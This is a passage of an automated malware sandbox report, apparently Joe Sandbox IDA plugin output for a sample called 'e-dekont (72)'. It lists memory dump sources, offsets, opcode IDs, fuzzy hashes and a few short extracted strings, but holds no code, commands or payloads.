                                                                • Instruction Fuzzy Hash: 31E01AB4A01299CFEB14EF61E868B9C7772FB55300F10809AD60AA3394CA305D41CF60
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052649873.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c30000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0b9e68c40320c0a8f6b57a9095d6688de8287f186e1d819354946d93d9756bcf
                                                                • Instruction ID: 9812a06fd846e9deac2d1eb90c8195a989b6d09f1c2280d6aa58c19b87068227
                                                                • Opcode Fuzzy Hash: 0b9e68c40320c0a8f6b57a9095d6688de8287f186e1d819354946d93d9756bcf
                                                                • Instruction Fuzzy Hash: 51E01A78A0021C8FCB54EF24D86879DB772FB96301F50419A910AA7354CB309D80CF12
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052649873.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c30000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a42dabb7cc3d3d3f7a2f7373075bb413a4aff236d5108051cfa0a19e99cef0fc
                                                                • Instruction ID: 4bc85af0e2c9d903141283893d33d4ac85d4b6d3d6de2eaff68d432c4c83e16b
                                                                • Opcode Fuzzy Hash: a42dabb7cc3d3d3f7a2f7373075bb413a4aff236d5108051cfa0a19e99cef0fc
                                                                • Instruction Fuzzy Hash: 78E01A74A082188BCB50DF24D85469E77B2FB69305F100199814AA3354CF311DC0CF15
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2050688982.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_5990000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a5befc8659ebe1f5d4dc9af52d32f7b154aa9e7dea78c500c2291eb751fc2f14
                                                                • Instruction ID: 97089e53c0faf5d8a0330fd0b7c695cf9c9057465bb2cf1b2c5e070b7f25e0f8
                                                                • Opcode Fuzzy Hash: a5befc8659ebe1f5d4dc9af52d32f7b154aa9e7dea78c500c2291eb751fc2f14
                                                                • Instruction Fuzzy Hash: 75E0B678A04218DBCF08EF98E05479CB7B2FB55301F50505AD105A7254CB309940CF11
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052132724.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ad0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 57b52fe3b64a44cff56fc9b016b6412d5e4533d4aa6b65622141ea622dc201e4
                                                                • Instruction ID: 3bd28515019d3e00ab753da957f5d5ae8938ca9cc827d6f3d62e539272aa47b4
                                                                • Opcode Fuzzy Hash: 57b52fe3b64a44cff56fc9b016b6412d5e4533d4aa6b65622141ea622dc201e4
                                                                • Instruction Fuzzy Hash: E0E017B8A052088FEB10DF64C894BDDBBF2FB5A310F44909AD506B7344CB344A80CF91
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052132724.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ad0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 010c1c9b37e048a28a4719ce19e015caf000824a2c2f177979d31613c1831fe0
                                                                • Instruction ID: cf6312e0b883e690961d7a7a899d9bea2bde09813cfdab839620e86c304e73d9
                                                                • Opcode Fuzzy Hash: 010c1c9b37e048a28a4719ce19e015caf000824a2c2f177979d31613c1831fe0
                                                                • Instruction Fuzzy Hash: 17D012F7255254AFC7419B64E854C857F74DF1A36134641D1F548CF232D621CD51C790
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2041545680.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e10000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 229d0fed243a138efe82b51955a5e9b144e1b27c8afbfb4e6e74cdac4f6a0318
                                                                • Instruction ID: f3ffe77b729f534aabffde3d6fd3bf622d0f2b6050be601453626d0698a1a04f
                                                                • Opcode Fuzzy Hash: 229d0fed243a138efe82b51955a5e9b144e1b27c8afbfb4e6e74cdac4f6a0318
                                                                • Instruction Fuzzy Hash: 67D0A774D84024CFDB05AF15E45439C7354FB10705F419C35C9025B119CB30DC599AC6
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052204310.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ae0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1baa28c8bbe8522e5a0dd956fd89b3bc05cf7d01414ffc1da89b6b9ce059d9a0
                                                                • Instruction ID: 424192f0d264a0d59bc5e3b2a7682ee1460d6315a6e5d8a18c4aa375ef786e73
                                                                • Opcode Fuzzy Hash: 1baa28c8bbe8522e5a0dd956fd89b3bc05cf7d01414ffc1da89b6b9ce059d9a0
                                                                • Instruction Fuzzy Hash: D5D05EF44012188FDB50AF24EC4474E3BF8AB42306F1093A480089B316C73559458F90
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052132724.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ad0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4c5563cb99f0083285bda919c78c93fdea8a78580dce58580a75a2437315fa9a
                                                                • Instruction ID: e3e6655c748b48c52eecf692a625dbba229a4229d8a4f1c9809a5decc71ca74a
                                                                • Opcode Fuzzy Hash: 4c5563cb99f0083285bda919c78c93fdea8a78580dce58580a75a2437315fa9a
                                                                • Instruction Fuzzy Hash: E8C08C32040108BB8B184E68E800CF67B9EDB856127008028BA0502112DA23A96697E0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2041545680.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e10000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2c7f8bbf08685ce7934018b3e8b934b570154d9b5a8b535618ec82e1c95e9bf5
                                                                • Instruction ID: cc7df32f694eed3211eaf78d67fb9165461c7fa74b9223e235f3943fcae04757
                                                                • Opcode Fuzzy Hash: 2c7f8bbf08685ce7934018b3e8b934b570154d9b5a8b535618ec82e1c95e9bf5
                                                                • Instruction Fuzzy Hash: 25C012324A02108FD7A4ABA8FC5A3A87BE0AB0171AF008129E419641A7CBB10500CB16
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2053042203.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6f90000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 328ebcfc4d6d4929e67486fb098f7abdeae6007c004b4f21152ab611c472d7a1
                                                                • Instruction ID: db49158977800d62d86f6cc39232e1808d6c9922841560091c0c7240db94d3be
                                                                • Opcode Fuzzy Hash: 328ebcfc4d6d4929e67486fb098f7abdeae6007c004b4f21152ab611c472d7a1
                                                                • Instruction Fuzzy Hash: 67C02B7105B3048FF3511644A40D37172EC830B316F485804521D00163C6714424D360
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052649873.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c30000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4f38e6e14756059030b93ebc3c1a5aa59e36b527810eb62fc6d6794ba2ea87da
                                                                • Instruction ID: a795294e907a4ae71fb190a46f444e88e4fb43bdb5106897642b1a0af10ce855
                                                                • Opcode Fuzzy Hash: 4f38e6e14756059030b93ebc3c1a5aa59e36b527810eb62fc6d6794ba2ea87da
                                                                • Instruction Fuzzy Hash: 46C0123001A7416FC7034B906C159C27F6A5E812053098182E55489073C7244425F731
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052649873.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c30000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fe2363ebcea9ff6657cecb22cebf7be09f2eb46c6b0edaa7978a2aa5e3f1cb12
                                                                • Instruction ID: 1feab02187df686b888f0a7231dd8a54b5bc152188bfafeade992e670939c0d8
                                                                • Opcode Fuzzy Hash: fe2363ebcea9ff6657cecb22cebf7be09f2eb46c6b0edaa7978a2aa5e3f1cb12
                                                                • Instruction Fuzzy Hash: 94C04C0402F3D41ACB5781341C605C31FAB4D8730DBEF91CA949089963C148452B5779
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052132724.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ad0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 640e0dd0a0c6169910ee53e072e422cf064ece7d4eac116d37d61b8bbb724923
                                                                • Instruction ID: e75333d2009041015117db1f97711a325b727067bda205bca0657b1e0b3ff765
                                                                • Opcode Fuzzy Hash: 640e0dd0a0c6169910ee53e072e422cf064ece7d4eac116d37d61b8bbb724923
                                                                • Instruction Fuzzy Hash: 77C080724481049FCB044E50B405E4B7FE0DB60311F034417F785401404A311120DE34
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2041545680.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e10000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 81b88797650ca7bb84cae6c5998aee19b5749e3537836e408754e04ed4377625
                                                                • Instruction ID: a6be69e1cf79875468ed6dd042074345493434ae647bea20fafed67f7f7fcf75
                                                                • Opcode Fuzzy Hash: 81b88797650ca7bb84cae6c5998aee19b5749e3537836e408754e04ed4377625
                                                                • Instruction Fuzzy Hash: D6C08C320512048FD3A03BE4FC0E32877E86B00A0AF404020E11C141B7CBB04510C72A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2041545680.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e10000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: aab762132f01e3ba29fd114675d76d6b36a0f481ebf0116ab98e6a1028d3af05
                                                                • Instruction ID: 1c8b05381361c918bfa94d362c1c3eaeca881c553de40acf55597f7c697507c0
                                                                • Opcode Fuzzy Hash: aab762132f01e3ba29fd114675d76d6b36a0f481ebf0116ab98e6a1028d3af05
                                                                • Instruction Fuzzy Hash: 9BC08C6294E3C08ED71322305C304CA3FA08CE2018BAF40D780C489933E428880982C2
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052132724.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ad0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: db0a2a74787abf281387abc78459c38fe47543c6bc55be623b69d8ce15622d9b
                                                                • Instruction ID: a7392283993b0a53205c4a1905df3aa66900cbdf441e87d442a31f02ee95f91a
                                                                • Opcode Fuzzy Hash: db0a2a74787abf281387abc78459c38fe47543c6bc55be623b69d8ce15622d9b
                                                                • Instruction Fuzzy Hash: BBC04C75140208EFC700DF55D444C45BFB8FF197617518495F9844B631C772E850DE54
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052204310.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ae0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e9aa465186cc52d93af44e854b708250828b2d937db26dab6293ec6dab55b112
                                                                • Instruction ID: 5bc84aa104614bc0f6e44f9008f616a7e9a16873413634e8b7e03b6528651ef0
                                                                • Opcode Fuzzy Hash: e9aa465186cc52d93af44e854b708250828b2d937db26dab6293ec6dab55b112
                                                                • Instruction Fuzzy Hash: 7AC04C76E1011E9BCF14DBD9E4419DCF7B4EF94322F008036D214A7104D6315526CF50
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052132724.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ad0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052132724.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ad0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052132724.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ad0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052649873.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c30000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052132724.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ad0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2041545680.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e10000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2041545680.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e10000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052649873.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c30000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (nq$,nq
                                                                • API String ID: 0-719044535
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2041545680.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e10000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'jq$4'jq
                                                                • API String ID: 0-1204115232
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2041545680.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e10000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'jq$4'jq
                                                                • API String ID: 0-1204115232
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052204310.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ae0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Vv}
                                                                • API String ID: 0-575040017
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2050688982.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_5990000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 0&,
                                                                • API String ID: 0-1722624584
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052649873.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c30000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Tejq
                                                                • API String ID: 0-2468842661
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052729526.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c80000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: c&A
                                                                • API String ID: 0-2748024365
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052649873.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c30000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Tejq
                                                                • API String ID: 0-2468842661
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2050688982.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_5990000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ^lfG
                                                                • API String ID: 0-2420411867
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2050688982.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_5990000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ^lfG
                                                                • API String ID: 0-2420411867
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052204310.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ae0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 6
                                                                • API String ID: 0-498629140
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052204310.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ae0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Vv}
                                                                • API String ID: 0-575040017
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052132724.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ad0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052132724.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ad0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2053042203.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6f90000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052729526.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c80000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052132724.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ad0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 501803812c7c291106db80f3a4feaa3463505a6639bd51adddff01f50df8dc29
                                                                • Instruction ID: d5187b69a2cf5b22487da4db63da3cbdc99eed431dfb3afa0dbc48c6f2d394ab
                                                                • Opcode Fuzzy Hash: 501803812c7c291106db80f3a4feaa3463505a6639bd51adddff01f50df8dc29
                                                                • Instruction Fuzzy Hash: 74515874E05218CFEB50EFA9D5447EEBBF6FB4A300F109029D01AAB295D774A885CF80
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052132724.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ad0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 53f9184987f92bf189014fb3ad7e9c37b08fc8b70ec48ad8e70e8d30ce259ba4
                                                                • Instruction ID: fc034dd3e0d185f6865149f15ecc38baf75a857768b85ca99a07ee4f28c6f96a
                                                                • Opcode Fuzzy Hash: 53f9184987f92bf189014fb3ad7e9c37b08fc8b70ec48ad8e70e8d30ce259ba4
                                                                • Instruction Fuzzy Hash: 02514874E05208CFEB50EFA9D5447EEBBF6FB4A300F109029D01AAB294D774A885CF40
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052132724.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ad0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d8e97b386c93d04998b293af261ced8e3e898c43f0a0567c4846f24aec1339b6
                                                                • Instruction ID: 8a3aa1924b00ab6a1550b0271c1852afd389057576bb2dcd94e6ffe91bef2eee
                                                                • Opcode Fuzzy Hash: d8e97b386c93d04998b293af261ced8e3e898c43f0a0567c4846f24aec1339b6
                                                                • Instruction Fuzzy Hash: 1851E5B4E05228CFEB54DF9AD8447EDBBF2BB89304F0481AAD50AAB354DB745985CF40
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052204310.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ae0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 410e5f52430f235a00c78f8205864d386731ced2e4257688c746907817359787
                                                                • Instruction ID: 69c29c67bcfa77a010c0544cd2bb3f9855147f4fb3d9b3f3fe0308a8bd2af183
                                                                • Opcode Fuzzy Hash: 410e5f52430f235a00c78f8205864d386731ced2e4257688c746907817359787
                                                                • Instruction Fuzzy Hash: F84179B1E016199BEB58DFABD94059EFBF3AFC8200F14C06AD908AB225DB305941CF54
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2053042203.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6f90000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fe45b4aa49aaba79a60cf2e538ee27e83a1645e08db7da66605200feaa046078
                                                                • Instruction ID: 3715d7f5a3dbc68dde79d7b2288a26b1f959437f1d13e96ea335bfb56728a181
                                                                • Opcode Fuzzy Hash: fe45b4aa49aaba79a60cf2e538ee27e83a1645e08db7da66605200feaa046078
                                                                • Instruction Fuzzy Hash: 8051C0B4D012298FEB68CF2AC8587DDB6F2AB89304F5080EAD41CA7654DB740AC9CF51
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052204310.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ae0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 01e6a34485267a1af1c558eb7010b6612e747158b0e0edb87abbb2a16b3f819a
                                                                • Instruction ID: 7b090bdbcefb27afdf1653f91e0eda43410171fae135bf559b8af3d8267e4d5a
                                                                • Opcode Fuzzy Hash: 01e6a34485267a1af1c558eb7010b6612e747158b0e0edb87abbb2a16b3f819a
                                                                • Instruction Fuzzy Hash: 2E4166B5E016598BDB48CFABD94059EFBF3AFC8300F14C07AD958AB264EB305945CB54
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052918142.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6cf0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 35bf0a664c3328dcb27b9e841ce508b6e26a423e2acdcf42c6ffc5dfb936236c
                                                                • Instruction ID: 116a516a3b81dfeebbe558d534034c845909ad1fdb3f7b829c06a883e2c94436
                                                                • Opcode Fuzzy Hash: 35bf0a664c3328dcb27b9e841ce508b6e26a423e2acdcf42c6ffc5dfb936236c
                                                                • Instruction Fuzzy Hash: BD515171D056588BEB6DCF2B8C542CAFAF3AFC9300F14C1FA954CA6265DB710A858F41
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052918142.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6cf0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: eb1b57bd75004c5595fce4ac847d6efcc94b2ab169c0da253fff644898aedfdf
                                                                • Instruction ID: bc48e6cb216c84e8f37656851a65d364463a89d9bc22bc6ca8dbd4126f216fb0
                                                                • Opcode Fuzzy Hash: eb1b57bd75004c5595fce4ac847d6efcc94b2ab169c0da253fff644898aedfdf
